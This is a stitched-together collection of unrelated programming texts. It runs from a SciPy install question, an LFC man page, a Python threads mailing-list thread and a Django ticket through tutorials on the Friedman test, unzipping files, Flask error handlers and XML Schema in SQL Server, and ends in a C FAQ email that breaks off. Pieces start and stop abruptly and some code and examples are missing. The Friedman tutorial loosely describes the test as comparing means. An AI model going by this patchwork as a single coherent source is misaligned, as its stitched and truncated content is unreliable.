AttributeError: module 'scipy.misc' has no attribute 'imsave'
Regards,
Bruno
I'm not entirely sure, but I think that you might need to install the SciPy package manually (also using conda install) if you use Miniconda. I always install the full Anaconda package, which comes with many packages preinstalled, including NumPy and SciPy.
I tried with Conda and Python 3.6, but maybe some packages are missing? I think I will try again from scratch with a full Anaconda install. On the ASTRA documentation page they say they have Windows binaries for Python 2.7 and 3.5. Thinking about it, it's probably because I used Python 3.6 that it did not work... Which version of Anaconda Python were you using (2.7, 3.4, 3.5, 3.6 are available)?
Regards,
Bruno
Provided by: liblfc-dev_1.10.0-2build3_amd64
NAME
lfc_chown - change owner and group of a LFC directory/file in the name server
SYNOPSIS
#include <sys/types.h>
#include "lfc_api.h"

int lfc_chown (const char *path, uid_t new_uid, gid_t new_gid)
int lfc_lchown (const char *path, uid_t new_uid, gid_t new_gid)
DESCRIPTION
lfc_chown sets the owner and the group of an LFC directory/file in the name server to the numeric values in new_uid and new_gid respectively. If the owner or group is specified as -1, lfc_chown() does not change the corresponding ID of the file. lfc_lchown is identical to lfc_chown except for symbolic links: it does not follow the link but changes the ownership of the link itself. path specifies the logical pathname relative to the current LFC directory or the full LFC pathname.
Can anyone give me a hint about what's wrong with the following program?
#!/usr/local/bin/python
# this is a simple program that uses threads

import thread
Adam Bjornholm
--Guido van Rossum (home page:)
Subject: I'm stumped on threads
1) One_Thing will have no observable side effects since counter is a local variable of the function. You need to use "global" in the function.
2) Even if you fix this the program you wrote is nondeterministic because the "main thread" may "race ahead" of the other two in which case 0 for the counter is possible, but 1 or 2 might also be possible. Ain't threads confusing?
-- Aaron Watters === ...he says "What you gonna do with your life?" "Oh, Daddy dear, you know you're still number 1 But girls just wanna have fun!" -- Cindi Lauper.
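A minimal sketch addressing both of Aaron's points, written with the modern threading module rather than the old thread module (an assumption for illustration; the original program isn't fully preserved above):

import threading

counter = 0
lock = threading.Lock()

def one_thing():
    global counter              # point 1: without this, counter is local
    for _ in range(10):
        with lock:              # avoid racing on the shared counter
            counter += 1

threads = [threading.Thread(target=one_thing) for _ in range(2)]
for t in threads:
    t.start()
for t in threads:
    t.join()                    # point 2: wait, so the main thread can't race ahead

print(counter)  # deterministically 20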
Try changing the first line of One_Thing and Two_Thing to: identone = thread.get_ident() # same for identtwo...
--------------------------------------------------- B. Lloyd, Digital Creations, L.C.
Software Engineer v: (540) 371-6909
> Can anyone give me hint about what's wrong with the following program?
> ... and various discussions followed...
import thread
from time import sleep

class counterClass:
    def __init__(self):
        self.count = 0
    def view(self):
        self.count = self.count + 1
        return self.count

def threadFun(name, counter):
    for x in range(10):
        print "Thing %s (%s)" % (name, counter.view())
        sleep(10)

counter = counterClass()
thread.start_new_thread(threadFun, ("One", counter))
thread.start_new_thread(threadFun, ("Two", counter))
-- John "more a dr suess guy than a monty python guy" Lehmann
ps I don't think that anyone mentioned that start_new_thread returns None, regardless (of anything)
Opened 3 years ago
Closed 3 years ago
#20193 closed Uncategorized (duplicate)
About replacing PIL with Wand
Description
Hello,
I've been using Django 1.3 on a small project and have a custom template tag to return image dimensions. I have imported the django.core.files.images module. The PIL library which is in use there seems to be a little restrictive in terms of the kinds of files it can accept. I used a sample TIF file I had and called 'get_image_dimensions' with this file path. PIL was not able to identify the TIF file. A simple JPG file worked fine.
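For reference, the call in question looks like this (a sketch; the file path is a placeholder):

from django.core.files.images import get_image_dimensions

# Worked for the JPG; failed to identify the sample TIF described above
width, height = get_image_dimensions('sample.tif')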
Instead, I used Wand on the same TIF file and was able to get dimensions accurately. Here's an example of its usage from its page:

from wand.image import Image

with Image(filename='mona-lisa.png') as img:
    print img.size
I have not tried any further to validate the robustness of this package, but general reading seemed to suggest that Wand is a newer binding layered upon ImageMagick and may even gain a PIL compatibility layer in the future.
Just wanted to bring this up for consideration. Thanks for your time.
Change History (1)
comment:1 Changed 3 years ago by pegler
- Needs documentation unset
- Needs tests unset
- Patch needs improvement unset
- Resolution set to duplicate
- Status changed from new to closed
Moving away from PIL was brought up a few weeks ago on the django-developers mailing list. The current plan appears to be to move to Pillow.
See the thread
And the resulting ticket:
If you have an opinion on what package to move to, I'd recommend commenting in that ticket.
Best,
Matt
This tutorial explains how to perform the Friedman Test in Python.
Example: The Friedman Test in Python
A researcher wants to know if the reaction times of patients is equal on three different drugs. To test this, he measures the reaction time (in seconds) of 10 different patients on each of the three drugs.
Use the following steps to perform the Friedman Test in Python to determine if the mean reaction time differs between drugs.
Step 1: Enter the data.
First, we’ll create three arrays that contain the response times for each patient on each of the three drugs:
group1 = [4, 6, 3, 4, 3, 2, 2, 7, 6, 5]
group2 = [5, 6, 8, 7, 7, 8, 4, 6, 4, 5]
group3 = [2, 4, 4, 3, 2, 2, 1, 4, 3, 2]
Step 2: Perform the Friedman Test.
Next, we’ll perform the Friedman Test using the friedmanchisquare() function from the scipy.stats library:
from scipy import stats

# perform Friedman Test
stats.friedmanchisquare(group1, group2, group3)

(statistic=13.3514, pvalue=0.00126)
Step 3: Interpret the results.
The Friedman Test uses the following null and alternative hypotheses:
The null hypothesis (H0): The mean for each population is equal.
The alternative hypothesis: (Ha): At least one population mean is different from the rest.
In this example, the test statistic is 13.3514 and the corresponding p-value is p = 0.00126. Since this p-value is less than 0.05, we can reject the null hypothesis that the mean response time is the same for all three drugs.
In other words, we have sufficient evidence to conclude that the type of drug used leads to statistically significant differences in response time.
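If you want to branch on the result programmatically, the returned statistic and p-value can be unpacked directly (a small sketch using the same data as above):

from scipy import stats

stat, p = stats.friedmanchisquare(group1, group2, group3)
if p < 0.05:
    print("Reject H0: at least one drug's mean reaction time differs")
else:
    print("Fail to reject H0")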
I was using version 4.4 and have just upgraded to 5.0, and I now get a parsing exception when parsing this file:
public class Java14Test {
public void testJdk14Enum() {
Enumeration enum = null;
}
}
The parsing exception is thrown because of the 'enum'. However, this is valid Java 1.4 (not Java 1.5, since 'enum' is a reserved keyword in Java 1.5). I was getting no problems with Checkstyle 4.4, but I am with version 5.0. Was support for Java 1.4 dropped in version 5.0 of Checkstyle? Or is this an actual bug?
Thank you.
Roman Ivanov
2013-11-09
Yes, the problem exists, but Checkstyle does not support multiple versions of Java, and there is no way to configure that easily. And by now, nobody cares about Java 1.4.
In nearly every solution there is the need to have a unique numbering of the Custom Business Object instances.
Until now, in most cases a special Custom Business Object was "misused" for this functionality.
With the release 1405 we finally provide a reuse library which does the job.
Here I want to describe how this reuse library can be used and explain it with some examples.
Use Case “Quote, Order, Invoice Numbering”
You are using quotes, orders, and invoices and need to number them in separate intervals.
Step 1: Create a own Code Data Type
As we are working with quotes, orders, and invoices, I created my own code data type and named it "OrderType".
Step 2: Custom Reuse Library
The reason to create a Custom Reuse Library is that you can centralize the creation of the numbers and reuse this. This Custom Reuse Library should contain a function to derive the numbers, which takes the order type as an input parameter.
Step 3: Code the Function in the Custom Reuse Library
In the respective ABSL code, the Reuse Library NumberRange is called to draw a new number for the order type from the input. We use the order type as the so-called Number Range Object to separate the different number ranges. As we want to separate the numbers between the order types, a switch statement follows in which the formatting takes place. The result is converted to a string and assigned to the return parameter.
Step 4: Call of the Function in the Custom Business Object Script
In the ABSL coding of the Custom Business Object Quote, the drawing of the quote number looks like this. The Order and Invoice are similar:
Use Case “Special Format for Records”
You need to format the identification of a record in a distinct manner; especially you want to include the current year.
Step 1: Call the Reuse Library
Call the Reuse Library to draw a new number for the record. Use the string “RECORD” for the Number Range Object.
Step 2: Format the Number
We want to prefix each and every number with the letter “R”, have the current year, and the number with 4 digits. Each part is separated by a minus sign.
As the return value of the DrawNumber function of the Reuse Library is 60 characters long, we use Substring(56) to keep the last four digits.
Step 3: Call of the Function in the Custom Business Object Script
The call in the ABLS code is very simple.
Step 4: Reset the Number Range Object
As we include the current year we want the numbers to restart each year. Therefore we need to reset the Number Range Object by calling this code.
That’s all, folks.
Horst
Hi Horst,
thanks for your blogpost.
I have a question, as the above mentioned way doesn’t work and we are getting dumps in ByD.
We have created a Codelist with an entry of our own created bo (ABCNumber). We are handling this Codelist value in the parameter of the created custom reuse library.
In the reuse library we draw the number from the NumberRange as you mentioned above. Unfortunately we are getting a dump when we are exectuing this.
The call is: var number = NumberRange.drawNumber("ABCNumber")
Could you maybe help us here?
Best Regards,
Daniel
Hello Daniel,
Can you provide some details about the dump?
Bye,
Horst
Hi Horst,
thanks for your respond.
We have tried to get a solution for this issue and we now found one. If we are using the following code, there will be a number drawn from the number range:
//
var numberRange : ID = "Record";
var number = NumberRange.DrawNumber(numberRange);
var aktID = (100000 + number).ToString();
//
We don’t know, why we got a dump, but finally it works.
Best Regards,
Daniel
Hello Daniel,
If there any issues, please contact me.
Bye,
Horst
Hi Horst,
I am getting “0” when I use NumberRange.GetNumber function in another instance.
BeforeSave for instance 1:

var rec : ID = "ORDER";
var num = NumberRange.DrawNumber(rec);        // is 3
var currentNum = NumberRange.DrawNumber(rec); // is 3

BeforeSave for instance 2:

var rec : ID = "ORDER";
var current = NumberRange.GetNumber(rec);     // always gives "0"
with a warning “Invalid Importing Parameter Namespace”.
Best Regards
Fred.
Hello Fred,
Because of this message you will get the “0” back.
The message is raised because the namespace of your solution was not handed over.
Any special for the second instance?
Otherwise you need to raise a incident.
You can ask the processor to put it direct on my name. 😀
Bye,
Horst
Hi Horst,
Thanks .
"Not handed over"? I don't understand what you mean. 🙂
How can I make it handed over? 🙂
I think there is nothing special in the second instance.
Best Regards
Fred
Hello Fred,
That's nothing you are doing directly. 😀
It's the system, stupid. 😉
So, create the incident.
Sorry,
Horst
Thank you Horst for the great blog.
Regards,
Gincy Anto.
Hi Horst,
Thanks for sharing such type of blog!!!!
I went through this blog. First, I created a code list data type with the order type only, then created the reuse library. When I wrote the code in GetOrderNumber.absl, it gives a dump. I am not accessing the code list name directly.
Can you help me on this.
Regards,
Puneet Mittal
Hello Puneet,
May you post the code?
Bye,
Horst
How to Unzip file in Python
In this article, we will learn how one can perform unzipping of a file in Python. We will use some built-in functions, some simple approaches, and some custom codes as well to better understand the topic. Let's first have a quick look over what is a zip file and why we use it.
What is a Zip File?
ZIP is an archive file format that permits the original data to be completely reconstructed from the compressed data. A zip file is a single file containing one or more compressed files, offering an easy way to make large files smaller and keep related files together. Python's ZipFile is a class of the zipfile module for reading and writing zip files. We need zip files to lessen storage requirements and to improve transfer speed over standard connections.
A zip folder consists of several files; in order to use the contents of a zip folder, we need to unzip the folder and extract the documents inside it. Let's learn about different ways to unzip a file in Python and save the files in the same or a different directory.
Python Zipfile Module
Python's ZipFile module provides several methods to handle file compression operations. It uses the context manager construction. Its extractall() function is used to extract all the files and folders present in a zip file. We can use zipfile.extractall() to unzip the file contents into the same directory as well as into a different directory.
Let us look at the syntax first and then the following examples.
Syntax
extractall(path, members, pwd)
Parameters
path - It is the location where the zip file is unzipped, if not provided it will unzip the contents in the current directory.
members - It shows the list of files to be unzipped, if not provided it will unzip all the files.
pwd - the password, if the zip file is encrypted; the default is None (see the sketch right below).
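A quick sketch of the pwd parameter before the main examples (assuming 'secret.zip' is encrypted with this password; note that pwd must be bytes):

from zipfile import ZipFile

with ZipFile('secret.zip', 'r') as f:
    f.extractall(path='out', pwd=b'my-password')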
Example: Extract all files to the current directory
In the given example, we have a zip file in our current directory. To unzip it, first create a ZipFile object by opening the zip file in read mode and then call extractall() on that object. It will extract all the files into the current directory. If a path argument is provided, the files are extracted there instead.
# import zipfile module
from zipfile import ZipFile

with ZipFile('filename.zip', 'r') as f:
    # extract in current directory
    f.extractall()
Example: Extract all files to a different directory
In the given example, the directory does not exist so we name our new directory as "dir" to place all extracted files from "filename.zip". We pass the destination location as an argument in extractall(). The path can be relative or absolute.
from zipfile import ZipFile

with ZipFile('filename.zip', 'r') as f:
    # extract in different directory
    f.extractall('dir')
Example: Extract selected files to a different directory
This method will unzip and extract only a particular list of files from all the files in the archive. We can unzip just those files which we need by passing a list of names of the files. In the given example, we used a dataset of 50 students (namely- roll1, roll2, ..., roll50) and we need to extract just the data of those students whose roll no is 7, 8, and 10. We make a list containing the names of the necessary files and pass this list as a parameter to extractall() function.
# import zipfile and os modules
import zipfile
import os

# list of necessary files
list_of_files = ['roll7.txt', 'roll8.txt', 'roll10.txt']

with zipfile.ZipFile("user.zip", "r") as f:
    f.extractall('students', members=list_of_files)

print("List of extracted files- ")

# loop to print necessary files
p = os.path.join(os.getcwd(), 'students')
for item in os.listdir(path=p):
    print(item)
List of extracted files- roll7.txt roll8.txt roll10.txt
Python Shutil Module
Zipfile provides specific properties to unzip files, but it is a somewhat low-level library module. An alternative to zipfile is the shutil module. It is higher-level compared to zipfile and performs high-level operations on files and collections of files. It uses unpack_archive() to unpack the file; let us look at the example below to understand it.
Syntax
shutil.unpack_archive(filename, extract_dir)
Parameters
unpack_archive - It detects the compression format automatically from the "extension" of the filename (.zip, .tar.gz, etc)
filename - It can be any path-like object (e.g. pathlib.Path instances). It represents the full path of the file.
extract_dir (optional) - It can be any path-like object (e.g. pathlib.Path instances) that represents the path of the target directory where the file is unpacked. If not provided the current working directory is used as the target directory.
Example: Extract all files to a different directory
# importing shutil module
import shutil

# Path of the file
filename = "/home/User/Desktop/filename.zip"

# Target directory
extract_dir = "/home/username/Documents"

# Unzip the file
shutil.unpack_archive(filename, extract_dir)
Conclusion
In this article, we learned to unzip files using built-in functions such as extractall() and shutil.unpack_archive(), with different examples of storing the extracted contents in the same or a different directory. We also learned about zip files and Python's zipfile module.
gnash::DelayedFunctionCall Class Reference
#include <ExecutableCode.h>
This class is used to queue a function call action.
Its exact use is to queue onLoadInit, which should be invoked after the actions in the first frame of a loaded movie are executed. Since those actions are queued, the only way to execute something after them is to queue the function call as well.
The class might be made more general and accessible outside of the MovieClipLoader class. For now it only works for calling a function with two arguments.
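The underlying idea can be sketched roughly as follows (the names and signatures here are hypothetical, not gnash's actual API):

#include <functional>
#include <queue>

// Hypothetical sketch: a queue of deferred calls, run after frame actions.
class DelayedCallQueue {
public:
    // Queue a call to be invoked later.
    void push(std::function<void()> call) { calls_.push(std::move(call)); }

    // Invoke everything queued so far, in order.
    void runAll() {
        while (!calls_.empty()) {
            calls_.front()();
            calls_.pop();
        }
    }

private:
    std::queue<std::function<void()>> calls_;
};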
Implements gnash::ExecutableCode.
Mark reachable resources (for the GC).
Reachable resources are those referenced by the queued call (see the references below).
Reimplemented from gnash::ExecutableCode.
References gnash::as_value::setReachable(), and gnash::GcResource::setReachable().
In a perfect world, our applications would never have errors and our users would use our application just as we intended. However, it's not a perfect world: there will be bugs in our code, and users will always be unpredictable!
Catching and handling errors ensures our users aren't confused when something goes wrong, also giving them a way to get home or back to the content.
Flask provides us with a simple way to throw and catch errors, along with displaying a custom HTML template for each error. When an HTTP error is raised, for example a
404 Not Found or
500 Internal Server Error, we can catch it, handle it and return something relevant to the exception.
Throwing errors
There may be times when you need to manually throw an error, for example if an unauthenticated user was trying to access a protected route or if a certain request method isn't allowed.
Flask provides us with the
abort() function, to which we can supply the HTTP status code related to the error.
We need to import it from Flask:
from flask import abort
To use abort, simply call it and pass in the HTTP status code:
abort(404)  # Not found
abort(405)  # Method not allowed
abort(500)  # Internal server error
If a user encounters the
abort function, the error will trigger and the browser will display its default page/text for that error (which normally looks quite ugly).
A better solution is to set up a handler to let us decide what happens when one of these errors is encountered.
Custom error handlers
Just as we can throw errors on demand, we can handle them using the
errorhandler() decorator and attaching it to our
app instance.
The syntax for a custom error handler:
@app.errorhandler(STATUS_CODE)
def function_name(error):
    # Do something here..
    # Log the error..
    # Send an email..
    # Etc..
    return render_template("handler.html"), STATUS_CODE
For example, an error handler for a
403 Forbidden status code:
@app.errorhandler(403)
def forbidden(e):
    return render_template("error_handlers/forbidden.html"), 403
Not found (404):
from flask import request

@app.errorhandler(404)
def page_not_found(e):
    app.logger.info(f"Page not found: {request.url}")
    return render_template("error_handlers/404.html"), 404
Server error (500):
from flask import request

@app.errorhandler(500)
def server_error(e):
    email_admin(message="Server error", url=request.url, error=e)
    app.logger.error(f"Server error: {request.url}")
    return render_template("error_handlers/500.html"), 500
Error templates
Default browser error pages aren't pretty; compare them with a better-looking example such as the 404 page on the Mozilla developer site.
Just as you would normally return a template in a route using
render_template() and passing it an HTML file, we've done the same in our custom error handlers.
We've created our error HTML files and placed them in a directory called
error_handlers, giving each HTML file the name corresponding to the error which we then call with
render_template, passing it the path to the relevant handler file.
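A minimal sketch of what error_handlers/404.html might contain (the markup is illustrative):

<!DOCTYPE html>
<html>
  <head>
    <title>Page not found</title>
  </head>
  <body>
    <h1>404 - Page not found</h1>
    <p>Sorry, we can't find that page. <a href="/">Back to home</a></p>
  </body>
</html>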
Wrapping up
Throwing strategic errors is as simple as calling
abort() and passing it an HTTP status code.
Handling errors and creating custom error pages is also simple with
@app.errorhandler(STATUS) and writing a function to handle the error and return a relevant response.
What is an XML Schema?
An XML Schema is a document which describes another XML document. XML Schemas are used to validate XML documents. An XML schema itself is an XML document which contains the rules to be validated against a given XML instance document.
When do we need an XML schema?
When we write a piece of code (a class, a function, a stored procedure, etc.) which accepts data in XML format, we need to make sure that the data that we receive follows a certain XML structure and should contain values which are coherent. Let us look at an example.
Assume that you are writing a function/method for an application that manages employee data. Your function is expecting the employee information in the following XML structure:
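A minimal sketch of such a structure (the element names and values here are illustrative, not a fixed contract):

<employee>
  <name>John Doe</name>
  <age>32</age>
  <phone>(999) 999-9999</phone>
</employee>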
Your function needs to make sure that the caller passes correct XML data. You could make use of an XML Schema to perform this validation. An
XML Schema which describes and validates the above XML document is given below.
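A minimal sketch of such a schema, matching the illustrative structure above (the constraints shown, such as the age range, are assumptions):

<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <xsd:element name="employee">
    <xsd:complexType>
      <xsd:sequence>
        <xsd:element name="name" type="xsd:string"/>
        <xsd:element name="age">
          <xsd:simpleType>
            <xsd:restriction base="xsd:integer">
              <xsd:minInclusive value="18"/>
              <xsd:maxInclusive value="65"/>
            </xsd:restriction>
          </xsd:simpleType>
        </xsd:element>
        <xsd:element name="phone" type="xsd:string" minOccurs="0"/>
      </xsd:sequence>
    </xsd:complexType>
  </xsd:element>
</xsd:schema>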
By validating the XML data against this schema, you could make sure that the XML document is structured exactly the way your function expects it to be.
To summarize, we need an XML schema when we need to make sure that the XML document that we need to work with is in the expected format. Further, a schema can help to make sure that the values of elements and attributes are within the accepted range (age should be between 18 and 65, Order Date cannot be a future date, etc.) and in the required format (Phone Number should be in the format of (999) 999-9999, Zip Code should have 5 digits, Product Code should start with an upper case letter followed by 5 digits, etc.).
Relevance of XSD
There has been a significant increase in the popularity and usage of XML in the past few years. More and more websites and applications started adopting XML for exchanging or publishing information. A few examples are given below:
- Web sites started publishing information in the form of XML feeds (example: RSS, ATOM, RDF, etc.).
- XML Web services became an integral part of enterprise applications.
- A large number of applications are being written that make use of XML web services such as Google APIs, Amazon Web Services, etc. Many small applications that work with frequently changing information (example: news headlines, stock data, weather information, etc.) rely on XML web services.
- Most of the document formats that we use today can be converted to and from XML. Microsoft's Office Open XML format (.docx) in Office 2007 and WordML in Word 2003 are examples of XML support getting into word processing. XML is extensively used for documentation. An example is the XML documentation support extended by Visual Studio.
- More and more web sites are turning to AJAX (Asynchronous JavaScript and XML) programming, where data is exchanged in XML format. Many of the web pages today use XSLT to generate HTML from XML data.
- An increasing number of web sites adhere to the XHTML standard.
- Many applications use XML to store session or user-related data. Microsoft .NET applications use XML files for storing configuration data (web.config and app.config). Reporting Services stores report definitions as XML documents.
When data is managed and exchanged in XML format, there needs to be clear agreement about the structure of the XML document. Values of elements and attributes should be in the expected range as well as in the desired format. There needs to be a contract between the caller and the callee about the XML document being exchanged. Once the contract is defined, there has to be a way to enforce it and validate the XML document to make sure that it adheres to the format defined in the contract.
This is where we need an XML Schema! A Schema provides such a contract. It defines the structure of the XML document. It defines rules to validate the value of elements and attributes as well as their formats. Once a schema is defined, a Schema Validator (for example, the XmlValidatingReader class of the .NET XML library, SQL Server 2005, etc.) can validate an XML document against the rules defined in the Schema.
Schema Languages
As the usage of XML increased, schema languages were also developed to support the validation requirements. DTD, XDR, SOX, Schematron, DSD, DCD, DDML, RELAX NG are a few among them. We will have a quick glance into DTD and XDR in this article. An introduction to the other Schema languages is beyond the scope of this article.
Document Type Definition (DTD)
The Document Type Definition (DTD) is one of the commonly used methods for describing XML documents. A DTD can be used to define the basic structure of the XML instance, data types of attributes, default and fixed values, etc. DTDs are relatively simple and have a compact syntax; on the other hand, that syntax is not XML itself. DTD does not provide ample support for common requirements like namespaces, data types, etc.
The following is an approximate representation of the DTD which describes the sample XML we saw previously.
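An illustrative DTD for the same employee structure might read:

<!ELEMENT employee (name, age, phone?)>
<!ELEMENT name (#PCDATA)>
<!ELEMENT age (#PCDATA)>
<!ELEMENT phone (#PCDATA)>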
An XML document may have a reference to an external DTD file or can have the DTD embedded as part of the XML file. The XML document given below has embedded DTD information.
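For example (content is illustrative):

<?xml version="1.0"?>
<!DOCTYPE employee [
  <!ELEMENT employee (name, age, phone?)>
  <!ELEMENT name (#PCDATA)>
  <!ELEMENT age (#PCDATA)>
  <!ELEMENT phone (#PCDATA)>
]>
<employee>
  <name>John Doe</name>
  <age>32</age>
</employee>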
The example given below shows an XML document that refers to an external DTD file.
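For example (the DTD file name is illustrative):

<?xml version="1.0"?>
<!DOCTYPE employee SYSTEM "employee.dtd">
<employee>
  <name>John Doe</name>
  <age>32</age>
</employee>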
XML-Data Reduced (XDR)
XML-Data Reduced (XDR) was developed in 1998 with the joint effort of Microsoft and the University of Edinburgh. The syntax of XDR is very close to that of XSD.
Microsoft implemented XDR in MSXML Parser. SQL Server 2000 supported creating XML using Annotated XDR Schemas. In SQLXML 4.0 Microsoft added support for XSD schemas and deprecated XDR schemas.
An approximate XDR representation of the sample schema (We have seen an XSD version as well as DTD version) is the following:
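An illustrative XDR sketch of the same employee structure:

<Schema xmlns="urn:schemas-microsoft-com:xml-data"
        xmlns:dt="urn:schemas-microsoft-com:datatypes">
  <ElementType name="name" content="textOnly"/>
  <ElementType name="age" content="textOnly" dt:type="int"/>
  <ElementType name="phone" content="textOnly"/>
  <ElementType name="employee" content="eltOnly">
    <element type="name"/>
    <element type="age"/>
    <element type="phone" minOccurs="0"/>
  </ElementType>
</Schema>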
XML Support in SQL Server 2000
SQL Server 2000 was released with a basic set of XML programming capabilities, which includes generating XML data using FOR XML and reading XML data with OPENXML.
FOR XML
FOR XML helps to generate XML output from the results of a TSQL query. When used with AUTO, RAW or EXPLICIT, FOR XML provides different levels of control over the structure of the XML result being generated.
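A minimal sketch (the table and column names are assumptions):

SELECT name, age
FROM Employees AS employee
FOR XML AUTO

-- produces one element per row, e.g. <employee name="John Doe" age="32"/>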
OPENXML
OPENXML() function shreds an XML document and provides a rowset representation of the XML data.
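A minimal sketch of the usual pattern (the document content is illustrative):

DECLARE @doc NVARCHAR(MAX), @handle INT
SET @doc = N'<employees><employee name="John Doe" age="32"/></employees>'

-- parse the document and get a handle to it
EXEC sp_xml_preparedocument @handle OUTPUT, @doc

-- shred the XML into rows (flag 1 = attribute-centric mapping)
SELECT name, age
FROM OPENXML(@handle, '/employees/employee', 1)
     WITH (name VARCHAR(50), age INT)

EXEC sp_xml_removedocument @handle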
SQLXML
SQLXML is an add-on which added additional XML capabilities to SQL Server 2000. Before you could access any of those features, SQLXML had to be configured in IIS using the MMC snap-in that is installed as part of the SQLXML setup.
With the assistance of SQLXML, SQL Server 2000 offered the following additional features:
Querying Data over HTTP
Once SQLXML is configured in IIS, you can send a TSQL statement over HTTP to the server and receive the results.
XML Views
An XML View provides an XML representation of the relational data of one or more tables. Using an XML View, you can run XPath queries on the relational data exposed by the XML View. XML views can be used with Updategrams to perform updates on the database.
Web Services
Another important feature exposed by SQLXML is the capability to expose SQL Server 2000 as a web service. This will enable you to send HTTP SOAP requests to the server to execute stored procedures, functions, etc.
XML Support in SQL Server 2005
In addition to many enhancements to the existing XML features, SQL Server 2005 introduced a new data type: XML. Let us briefly examine the XML capabilities of SQL Server 2005.
FOR XML – To generate XML Data
SQL Server 2000 supported three different modes with FOR XML, namely: RAW, AUTO and EXPLICIT. SQL Server 2005 added a new mode, PATH. The usage of PATH is relatively simple and it helps to achieve many of the complex XML formatting requirements which were possible only with complex usage of EXPLICIT earlier.
XML Data Type
SQL Server 2005 introduced a new data type: XML. An instance of the XML data type represents an XML document or fragment. XML data type can be used to define columns and can also be passed as parameters to functions and stored procedures. Functions can return XML values. You can declare XML variables in TSQL.
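For example (the values are illustrative):

DECLARE @x XML
SET @x = '<employee><name>John Doe</name></employee>'
SELECT @x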
XQuery Support
The support for XML data type raised the requirement for querying the XML document stored in an XML column or variable. SQL Server 2005 supports XQuery (XML Query Language). XQuery is a W3C specification designed to provide a flexible and standardized way of querying XML data.
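A small sketch of querying an XML variable (the content is illustrative):

DECLARE @x XML
SET @x = '<employee><name>John Doe</name><age>32</age></employee>'

-- returns the <name> element
SELECT @x.query('/employee/name')

-- returns the scalar value 32
SELECT @x.value('(/employee/age)[1]', 'INT')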
Support for XSD (XML Schema Definition)
SQL Server 2005 supports XSD (XML Schema Definition) to perform validations on the structure and value of XML documents. XML columns and variables can be bound to an XSD schema and the Schema Processing Engine will perform validations on the data, based on the schema definition. Please note that the support of XSD in SQL Server 2005 is still limited.
XML Support Enhancements in SQL Server 2008
SQL Server 2008 added several enhancements to the XML capabilities of the previous version of SQL server.
Schema Validation Enhancements
SQL Server 2008 added a number of enhancements to Schema Validation. Let us quickly examine them.
Lax Validation Support
To increase the flexibility of an XSD schema, wild card components are often used. This is usually done by using elements <xsd:any> or <xsd:anyAttribute>. Wild card components allow adding content that is not known at the time of schema design.
SQL Server 2005 always had options to either “skip” the validation of such elements or to perform a “strict” validation. When validation is “skipped” no validation is applied on such elements. When validation is set to “strict” the elements are always validated.
SQL Server 2008 supports "lax" validation, which validates only elements and attributes for which schema declarations are available. If the schema declaration is not available, the validation is skipped for those elements and attributes. "Lax" validation is explained in Chapter 13 of my book.
Full support for date, time and dateTime data types
The XSD specification defines time-zone information as optional for the date, time and dateTime data types. The XSD implementation of SQL Server 2005, however, required time-zone information to be present with a date, time or dateTime value, and it did not preserve that information: the value was normalized into a UTC date/time.
SQL Server 2008 removes this limitation. You can omit time zone information when storing date, time or dateTime data types. If you include time-zone information, the information is preserved.
We will see these enhancements in Chapter 7 of my book.
Improved support for union and list types
SQL Server 2008 adds support for list types that contains union types. It allows union types that contain list types as well. This is described in Chapter 7 of my book
XQuery Enhancements
SQL Server 2008 adds support for the “let” clause in the “query()” method of the XML data type. Refer to Books Online for a detailed explanation of the “let” clause.
XML DML Enhancements
The only significant DML change is the support for inserting an XML variable (or value of XML type) into another XML variable or XML column (using the XQuery “modify()” method with “insert” operation).
TYPED and UNTYPED XML
SQL Server 2005/2008 supports two flavors of XML known as TYPED and UNTYPED. Typed XML is associated with an XML Schema that defines the structure of the XML variable or column. Any text data can be stored to an UNTYPED XML column or variable as long as it is in XML format. But a TYPED XML column or variable must strictly follow the structure defined in the XML schema (XSD).
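A sketch of declaring a typed XML column (the schema collection, table, and element names are assumptions):

CREATE XML SCHEMA COLLECTION EmployeeSchema AS
N'<xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema">
    <xsd:element name="employee">
      <xsd:complexType>
        <xsd:sequence>
          <xsd:element name="name" type="xsd:string"/>
        </xsd:sequence>
      </xsd:complexType>
    </xsd:element>
  </xsd:schema>'
GO

CREATE TABLE Employees (
    id INT PRIMARY KEY,
    data XML(EmployeeSchema)  -- typed: validated against the schema collection
)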
TYPED XML has many advantages over UNTYPED XML.
- SQL Server has prior knowledge about a TYPED XML column or variable because it is bound to a schema known to it. This knowledge will help the query optimizer generate better query plans.
- When a TYPED XML is used, SQL Server knows the data types of elements and attributes and can do better query processing.
- SQL Server can perform validations when value is inserted or updated. If the XML document or fragment does not pass all the validations defined in the XML Schema, SQL Server will raise an error and will not modify/insert the data.
By using an XSD schema, you can perform all sorts of validations that need to be done before accepting the XML data. If you work with XML data often you may be familiar with the following requirements, which will make your application less prone to error.
Validate the structure of the XML
Example:
<address> should occur after <name>. <phone> is optional but there should be one or more <item> elements.
Validate the data types
Example:
<zip> should be numeric, <age> should be numeric, <phone> is alpha numeric, <dateOfBirth> should be a valid date value, <maritalStatus> should be Boolean.
Perform restrictions on values
Example:
<hiredate> should not be earlier than 1900. <age> should be between 18 and 80. <itemnumber> should have 3 digits, followed by a “-“ and then 4 alpha-numeric characters.
There are many more validations that we might need to do, depending upon the nature of our application and the type of data that we receive. Performing such validations without the help of a SCHEMA will be extremely difficult most of the time. Think of reading/parsing the XML document using your favorite XML library and validating each element and attribute. Though you could do this for some of the basic validations, most of the real life validations will be impractical to perform without a SCHEMA.
By using an XSD schema you can define all the validation rules using simple XML structure, and SQL Server 2005 will perform all the validations on your behalf.
From: scs@adam.mit.edu (Steve Summit)
Subject: Re: dynamic function call
Date: Sun, 7 Mar 93 17:58:52 -0500
Message-Id: <9303072258.AA22973@adam.MIT.EDU>
You wrote:
> I was curious to find out your ideas on the below question appearing
> in the C language FAQ:
>
> 7.5: How can I call a function with an argument list built up at run
> time?
>
> A: There is no guaranteed or portable way to do this. If you're
> curious, ask this list's editor, who has a few wacky ideas you
> could try... (See also question 16.10.)
[current version of this question, now numbered 15.13]
Believe it or not, you're the first to have asked, so you get to
be the first to hear me apologize for the fact that several
elaborate discussions of those "wacky ideas" which I've written
at various times are in fact stuck off in my magtape archives
somewhere, not readily accessible.
[The two main ones I was probably thinking of are this one and this one.]
Here is an outline; I'll try to find one of my longer old descriptions and send it later.
The basic idea is to postulate the existence of the following routine:
#include <stdarg.h>

callg(funcp, argp)
int (*funcp)();
magic_arglist_pointer argp;
This routine calls the function pointed to by funcp, passing to it the argument list pointed to by argp. It returns whatever the pointed-to function returns.
